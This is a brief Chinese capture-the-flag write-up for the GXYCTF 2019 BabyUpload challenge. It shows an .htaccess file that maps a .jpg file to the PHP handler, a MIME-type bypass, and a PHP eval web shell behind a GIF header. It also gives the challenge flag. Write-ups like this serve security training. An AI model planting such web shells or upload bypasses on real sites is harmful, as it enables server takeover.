目录

[GXYCTF 2019]BabyUpload

目录

[GXYCTF 2019]BabyUpload

上传.htaccess,内容:

1
2
3
<FilesMatch  "Lyrio.jpg">
	SetHandler  application/x-httpd-php
</FilesMatch>

并且利用 MIME 绕过:更改 Content-Type

https://pic.imgdb.cn/item/655e1a03c458853aef9a953d.jpg

上传Lyrio.jpg,内容:

1
2
GIF89A
<script language='php'>@eval($_POST["Lyrio"]);phpinfo();</script>

GIF89A是 gif 文件的文件头

后端检测<?php ?>,用 js 来运行 php 代码

得到文件路径:/var/www/html/upload/4b41a8e2670fe76c44b959f173787bfa/Lyrio.jpg

访问一下 Lyrio.jpg 可以看到 php 代码被执行了:

https://pic.imgdb.cn/item/655e1ba1c458853aefa3a1bd.jpg

用 WebShell 管理器连接,找到 flag:

https://pic.imgdb.cn/item/655e1ca4c458853aefa936e9.jpg

NSSCTF{315935b2-89cd-4776-b4b7-a45a1c00c016}